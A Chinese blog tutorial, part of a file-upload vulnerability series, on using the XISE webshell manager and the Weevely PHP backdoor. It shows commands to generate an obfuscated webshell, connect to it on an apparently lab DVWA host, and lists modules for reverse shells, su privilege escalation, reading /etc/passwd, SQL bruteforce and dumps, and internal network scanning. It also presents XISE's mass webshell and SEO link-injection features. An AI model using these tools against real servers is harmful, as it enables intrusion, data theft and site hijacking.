文件上传漏洞（七）XISE寄生虫Weevely学习

精选原创

っ木深 2024-01-08 09:49:06 博主文章分类：信息安全 ©著作权

文章标签 PHP php Web 文章分类 网络安全

©著作权归作者所有：来自51CTO博客作者っ木深的原创作品，请联系作者获取转载授权，否则将追究法律责任

文件上传漏洞（七）XISE寄生虫Weevely学习_PHP

XISE简介

XISE WBMS（寄生虫）可以看出是中国菜刀的升级版，除了支持常规的webshell批量管理、文件管理和数据库管理之外

支持PHP、ASP、ASPX、JSP不同环境，支持 SEO所需要的批量挂链、批量内页等功能

支持批量导入txt和菜刀数据库，支持自动上传 shell

操作使用

批量导入菜刀数据库

文件上传漏洞（七）XISE寄生虫Weevely学习_Web_02

文件管理

文件上传漏洞（七）XISE寄生虫Weevely学习_Web_03

自动上传shell

第一次使用右键点击添加

在已经被控制的web也可以上传自动生成的小马，自动生成的小马也会自动生成链接

文件上传漏洞（七）XISE寄生虫Weevely学习_Web_04

文件上传漏洞（七）XISE寄生虫Weevely学习_PHP_05

文件上传漏洞（七）XISE寄生虫Weevely学习_Web_06

文件上传漏洞（七）XISE寄生虫Weevely学习_php_07

Weevely

简介

文件上传漏洞（七）XISE寄生虫Weevely学习_php_08

Weevely是一种武器化的Web Shell，它是为了后渗tou测试而设计的。它可以在运行时通过网络对其进行扩展。使用Weevely，您可以在没有命令行访问权限的情况下管理远程Web服务器。以下是Weevely的两个用法示例：

生成Weevely PHP代理：

weevely generate <password>

这将生成一个名为weevely.php的PHP文件，您可以将其上传到目标Web服务器上。

连接Weevely PHP代理：

weevely <URL> <password> [cmd]

这将连接到目标Web服务器上的Weevely PHP代理。如果提供了可选的cmd参数，则将在连接后立即执行该命令。

除了支持shell管理之外，还支持文件管理、安全审计、数据库管理、HTTP代理、内网渗tou

可以根据Weevely API文档，基于Python编写自己的拓展功能

地址为：https://github.com/epinna/weevely3

基础使用

安装weevely

kali linux已集成，在Linux中输入Weevely就得到一下帮助命令

文件上传漏洞（七）XISE寄生虫Weevely学习_PHP_09

生成webshell

weevely generate <password> <path> //加密码加路径

文件上传漏洞（七）XISE寄生虫Weevely学习_php_10

weevely generate pass123 ~/Desktop/hack2.php

直接在生成shell文件到桌面

文件上传漏洞（七）XISE寄生虫Weevely学习_php_11

这款工具只能支持PHP不能支持别的架构

查看Webshell

cd /usr/share/weevely/

文件上传漏洞（七）XISE寄生虫Weevely学习_Web_12

more hack.php

经过混绕编码后的后门

上传Webshell

文件上传漏洞（七）XISE寄生虫Weevely学习_Web_13

连接webshell

weevely <URL> <password> [cmd]

weevely http://172.16.70.214/dvwa/hackable/uploads/hack.php 123456

文件上传漏洞（七）XISE寄生虫Weevely学习_Web_14

功能详解

help

帮助文档命令，可以看到命令提示

文件上传漏洞（七）XISE寄生虫Weevely学习_PHP_15

shell

文件上传漏洞（七）XISE寄生虫Weevely学习_PHP_16

:shell_php Execute PHP commands.

:shell_sh Execute Shell commands.

:shell_su Elevate privileges with su command.

:backdoor_reversetcp Execute a reverse TCP shell.

:backdoor_tcp Spawn a shell on a TCP port.

审计

文件上传漏洞（七）XISE寄生虫Weevely学习_PHP_17

:audit_phpconf Audit PHP configuration.

:audit_suidsgid Find files with SUID or SGID flags.

:audit_filesystem Audit system files for wrong permissions.

:audit_etcpasswd Get /etc/passwd with different techniques.

系统

文件上传漏洞（七）XISE寄生虫Weevely学习_php_18

:system_extensions Collect PHP and webserver extension list.

:system_info Collect system information.

网络

文件上传漏洞（七）XISE寄生虫Weevely学习_php_19

:net_phpproxy Install PHP proxy on the target.

:net_curl Perform a curl-like HTTP request.

:net_proxy Proxify local HTTP traffic passing through the target.

:net_ifconfig Get network interfaces addresses.

:net_scan TCP Port scan.

数据库

文件上传漏洞（七）XISE寄生虫Weevely学习_Web_20

:bruteforce_sql Bruteforce SQL database.

:sql_dump Multi dbms mysqldump replacement.

:sql_console Execute SQL query or run console.

文件

文件上传漏洞（七）XISE寄生虫Weevely学习_PHP_21

:file_upload2web Upload file automatically to a web folder and get corresponding URL.

:file_upload Upload file to remote filesystem.

:file_read Read remote file from the remote filesystem.

:file_cp Copy single file.

:file_gzip Compress or expand gzip files.

:file_tar Compress or expand tar archives.

:file_enum Check existence and permissions of a list of paths.

:file_ls List directory content.

:file_check Get remote file information.

:file_find Find files with given names and attributes.

:file_download Download file to remote filesystem.

:file_rm Remove remote file.

:file_touch Change file timestamp.

:file_cd Change current working directory.

:file_webdownload Download URL to the filesystem

:file_mount Mount remote filesystem using HTTPfs.

:file_grep Print lines matching a pattern in multiple files.

:file_zip Compress or expand zip files.

:file_bzip2 Compress or expand bzip2 files.

:file_edit Edit remote file on a local editor.

虚拟终端

虚拟终端就和我们正常使用Linux一样

ls //查看当前文件夹

uname -a // uname -a命令用于显示所有系统信息，包括内核名称、主机名、内核版本、操作系统类型等等

pwd //pwd是一个Linux命令，用于打印当前工作目录的绝对路径。

cat /etc/passwd //cat /etc/passwd是一个Linux命令，用于查看本地系统上的用户列表。该命令将打印出一个文本文件，其中包含了系统上所有用户的用户名、用户ID、组ID、用户主目录、默认shell等信息。

信息探测

查看系统信息

:system_info //查看系统核心信息

:system_extensions //查看网站安装模块和插件

查看网络信息

说明

网络信息探测主要用于内网渗透，通过本地主机和网络信息，扫描其他服务器和开放的服务

:net_ifconfig //查看多张网卡

:net_scan //看看局域网开放端口扫描（基于渗tou机作为跳板进行内网横向）

查看审计信息

说明

通过审计，了解这个系统的脆弱性，例如不安全配置、可读性文件、账号信息等

:audit_filesystem //查看目标服务器有哪些文件是可写入的

:audit_phpconf //PHP敏感的配置文件

:system_info //目标操作系统信息

:system_extensions //查看PHP、阿帕奇拓展文件和插件

网络层面可以使用net

:net_ifconfig // 可以看到网段

:net_scan //指定一个目标网段或ip地址加端口比如1-100端口，扫描开放的端口。也可以跳着写IP地址和端口号，用英文逗号隔开

文件上传漏洞（七）XISE寄生虫Weevely学习_php_22

文件管理

:file_upload //本地上传文件

:file_upload2web //上传文件生成shell文件路径

:file_download //指定肉鸡文件下载到本地

:file_read //查看一个文件内容

上一篇：文件上传漏洞（六）一句话马图片

下一篇：墨者学院sql手工测试记录

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯